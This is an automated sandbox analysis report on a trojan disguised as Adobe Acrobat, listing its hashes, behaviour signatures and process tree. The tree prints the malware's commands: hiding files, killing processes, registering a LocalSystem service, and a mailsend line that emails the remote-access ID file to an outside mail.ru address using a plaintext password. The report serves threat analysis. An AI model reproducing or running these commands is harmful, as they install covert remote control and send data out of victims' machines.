Analysis
-
max time kernel
150s -
max time network
143s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
25/02/2021, 00:37
Static task
static1
Behavioral task
behavioral1
Sample
7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe
Resource
win7v20201028
General
-
Target
7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe
-
Size
5.0MB
-
MD5
24cae17860a840c0317018ef3d607e94
-
SHA1
7595283fd24ebae9f95ea80209d674ca9bd2afcc
-
SHA256
7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c
-
SHA512
bdfe1b899ef55a0ae793e672c190d79161899179d98b0577b5ceda8f02c66376ca0d366c0f087dbb043d30c7ec41a39b0cd2fcc6be4d66639777c6430db3ee82
Malware Config
Signatures
-
Executes dropped EXE 8 IoCs
pid Process 4432 AdobeFP.exe 4516 AdobeFP.exe 656 AdobeFP.exe 808 AdobeFP.exe 1116 Acrobat-XI.exe 1120 Acrobat-XI.exe 4684 Acrobat-XI.exe 4348 mailsend.exe -
Stops running service(s) 3 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 27 IoCs
description ioc Process File opened for modification C:\Program Files\Adobe\AdobeAcrobat\vp8decoder.dll 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\vp8decoder.dll attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\mailsend.exe 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\regedit.reg 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\IT.txt reg.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\mailsend.exe attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\vp8encoder.dll 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\install.bat 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\vp8encoder.dll attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\install.bat attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\IT.txt attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\mailsend.exe attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\webmvorbisencoder.dll 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File created C:\Program Files\Adobe\AdobeAcrobat\IT.txt reg.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\webmmux.dll 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\install.bat attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\regedit.reg attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\regedit.reg attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\webmvorbisdecoder.dll attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\webmvorbisdecoder.dll 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\webmmux.dll attrib.exe File opened for modification C:\Program Files\Adobe\AdobeAcrobat\webmvorbisencoder.dll attrib.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 2 IoCs
pid Process 196 timeout.exe 1540 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 3912 taskkill.exe 4076 taskkill.exe 4068 taskkill.exe 3816 taskkill.exe -
Runs .reg file with regedit 1 IoCs
pid Process 4508 regedit.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 4432 AdobeFP.exe 4432 AdobeFP.exe 4432 AdobeFP.exe 4432 AdobeFP.exe 4432 AdobeFP.exe 4432 AdobeFP.exe 4516 AdobeFP.exe 4516 AdobeFP.exe 656 AdobeFP.exe 656 AdobeFP.exe 808 AdobeFP.exe 808 AdobeFP.exe 808 AdobeFP.exe 808 AdobeFP.exe 808 AdobeFP.exe 808 AdobeFP.exe 1116 Acrobat-XI.exe 1116 Acrobat-XI.exe 4348 mailsend.exe 4348 mailsend.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 4684 Acrobat-XI.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 3912 taskkill.exe Token: SeDebugPrivilege 4076 taskkill.exe Token: SeDebugPrivilege 4068 taskkill.exe Token: SeDebugPrivilege 3816 taskkill.exe Token: SeDebugPrivilege 4432 AdobeFP.exe Token: SeDebugPrivilege 656 AdobeFP.exe Token: SeTakeOwnershipPrivilege 808 AdobeFP.exe Token: SeTcbPrivilege 808 AdobeFP.exe Token: SeTcbPrivilege 808 AdobeFP.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 4432 AdobeFP.exe 4516 AdobeFP.exe 656 AdobeFP.exe 808 AdobeFP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4712 wrote to memory of 3600 4712 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe 75 PID 4712 wrote to memory of 3600 4712 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe 75 PID 4712 wrote to memory of 3600 4712 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe 75 PID 3600 wrote to memory of 2800 3600 cmd.exe 77 PID 3600 wrote to memory of 2800 3600 cmd.exe 77 PID 3600 wrote to memory of 2800 3600 cmd.exe 77 PID 3600 wrote to memory of 748 3600 cmd.exe 78 PID 3600 wrote to memory of 748 3600 cmd.exe 78 PID 3600 wrote to memory of 748 3600 cmd.exe 78 PID 3600 wrote to memory of 3188 3600 cmd.exe 79 PID 3600 wrote to memory of 3188 3600 cmd.exe 79 PID 3600 wrote to memory of 3188 3600 cmd.exe 79 PID 3600 wrote to memory of 3828 3600 cmd.exe 80 PID 3600 wrote to memory of 3828 3600 cmd.exe 80 PID 3600 wrote to memory of 3828 3600 cmd.exe 80 PID 3600 wrote to memory of 3912 3600 cmd.exe 81 PID 3600 wrote to memory of 3912 3600 cmd.exe 81 PID 3600 wrote to memory of 3912 3600 cmd.exe 81 PID 3600 wrote to memory of 4076 3600 cmd.exe 82 PID 3600 wrote to memory of 4076 3600 cmd.exe 82 PID 3600 wrote to memory of 4076 3600 cmd.exe 82 PID 3600 wrote to memory of 4068 3600 cmd.exe 83 PID 3600 wrote to memory of 4068 3600 cmd.exe 83 PID 3600 wrote to memory of 4068 3600 cmd.exe 83 PID 3600 wrote to memory of 3816 3600 cmd.exe 84 PID 3600 wrote to memory of 3816 3600 cmd.exe 84 PID 3600 wrote to memory of 3816 3600 cmd.exe 84 PID 3600 wrote to memory of 3324 3600 cmd.exe 85 PID 3600 wrote to memory of 3324 3600 cmd.exe 85 PID 3600 wrote to memory of 3324 3600 cmd.exe 85 PID 3600 wrote to memory of 4444 3600 cmd.exe 86 PID 3600 wrote to memory of 4444 3600 cmd.exe 86 PID 3600 wrote to memory of 4444 3600 cmd.exe 86 PID 3600 wrote to memory of 4432 3600 cmd.exe 87 PID 3600 wrote to memory of 4432 3600 cmd.exe 87 PID 3600 wrote to memory of 4432 3600 cmd.exe 87 PID 3600 wrote to memory of 4516 3600 cmd.exe 88 PID 3600 wrote to memory of 4516 3600 cmd.exe 88 PID 3600 wrote to memory of 4516 3600 cmd.exe 88 PID 3600 wrote to memory of 4508 3600 cmd.exe 89 PID 3600 wrote to memory of 4508 3600 cmd.exe 89 PID 3600 wrote to memory of 4508 3600 cmd.exe 89 PID 3600 wrote to memory of 4528 3600 cmd.exe 90 PID 3600 wrote to memory of 4528 3600 cmd.exe 90 PID 3600 wrote to memory of 4528 3600 cmd.exe 90 PID 3600 wrote to memory of 512 3600 cmd.exe 91 PID 3600 wrote to memory of 512 3600 cmd.exe 91 PID 3600 wrote to memory of 512 3600 cmd.exe 91 PID 3600 wrote to memory of 656 3600 cmd.exe 92 PID 3600 wrote to memory of 656 3600 cmd.exe 92 PID 3600 wrote to memory of 656 3600 cmd.exe 92 PID 808 wrote to memory of 1116 808 AdobeFP.exe 95 PID 808 wrote to memory of 1120 808 AdobeFP.exe 94 PID 808 wrote to memory of 1116 808 AdobeFP.exe 95 PID 808 wrote to memory of 1116 808 AdobeFP.exe 95 PID 808 wrote to memory of 1120 808 AdobeFP.exe 94 PID 808 wrote to memory of 1120 808 AdobeFP.exe 94 PID 3600 wrote to memory of 1540 3600 cmd.exe 96 PID 3600 wrote to memory of 1540 3600 cmd.exe 96 PID 3600 wrote to memory of 1540 3600 cmd.exe 96 PID 1116 wrote to memory of 4684 1116 Acrobat-XI.exe 100 PID 1116 wrote to memory of 4684 1116 Acrobat-XI.exe 100 PID 1116 wrote to memory of 4684 1116 Acrobat-XI.exe 100 PID 3600 wrote to memory of 4256 3600 cmd.exe 101 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 692 attrib.exe 2668 attrib.exe 4180 attrib.exe 2800 attrib.exe 748 attrib.exe 3188 attrib.exe 3828 attrib.exe 4184 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe"C:\Users\Admin\AppData\Local\Temp\7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c.bin.exe"1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files\Adobe\AdobeAcrobat\install.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\Adobe\AdobeAcrobat"3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:2800
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\Adobe\AdobeAcrobat\*.*"3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:748
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\Adobe\AdobeAcrobat\Logs"3⤵
- Views/modifies file attributes
PID:3188
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\Adobe\AdobeAcrobat\Logs\*.*"3⤵
- Views/modifies file attributes
PID:3828
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rfusclient.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3912
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rutserv.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Acrobat-XI.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4068
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im AdobeFP.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3816
-
-
C:\Windows\SysWOW64\sc.exesc delete AdobeReader3⤵PID:3324
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SYSTEM\Hardware Driver\LocalDisk" /f3⤵PID:4444
-
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe" /silentinstall3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4432
-
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe" /firewall3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4516
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "C:\Program Files\Adobe\AdobeAcrobat\regedit.reg"3⤵
- Runs .reg file with regedit
PID:4508
-
-
C:\Windows\SysWOW64\sc.exesc failure AdobeReader reset= 0 actions= restart/1000/restart/1000/restart/10003⤵PID:4528
-
-
C:\Windows\SysWOW64\sc.exesc config AdobeReader obj= LocalSystem type= interact type= own3⤵PID:512
-
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe" /start3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:656
-
-
C:\Windows\SysWOW64\timeout.exetimeout 103⤵
- Delays execution with timeout.exe
PID:1540
-
-
C:\Windows\SysWOW64\reg.exereg export "HKLM\SYSTEM\Hardware Driver\LocalDisk\v4\Server\Parameters" "IT.txt"3⤵
- Drops file in Program Files directory
PID:4256
-
-
C:\Windows\SysWOW64\timeout.exetimeout 103⤵
- Delays execution with timeout.exe
PID:196
-
-
C:\Program Files\Adobe\AdobeAcrobat\mailsend.exemailsend.exe -t [email protected] -attach IT.txt,application/txt -sub "RMS ID" -smtp smtp.mail.ru -port 465 -f [email protected] -name "RMS ToktonIT" -ssl -auth-login -user [email protected] -pass hT*euyAyCT43 -q3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4348
-
-
C:\Windows\SysWOW64\attrib.exeattrib "regedit.reg" -S -H /S /D3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:4184
-
-
C:\Windows\SysWOW64\attrib.exeattrib "install.bat" -S -H /S /D3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:692
-
-
C:\Windows\SysWOW64\attrib.exeattrib "IT.txt" -S -H /S /D3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:2668
-
-
C:\Windows\SysWOW64\attrib.exeattrib "mailsend.exe" -S -H /S /D3⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:4180
-
-
-
C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"C:\Program Files\Adobe\AdobeAcrobat\AdobeFP.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe"C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe" /tray2⤵
- Executes dropped EXE
PID:1120
-
-
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe"C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe"C:\Program Files\Adobe\AdobeAcrobat\Acrobat-XI.exe" /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:4684
-
-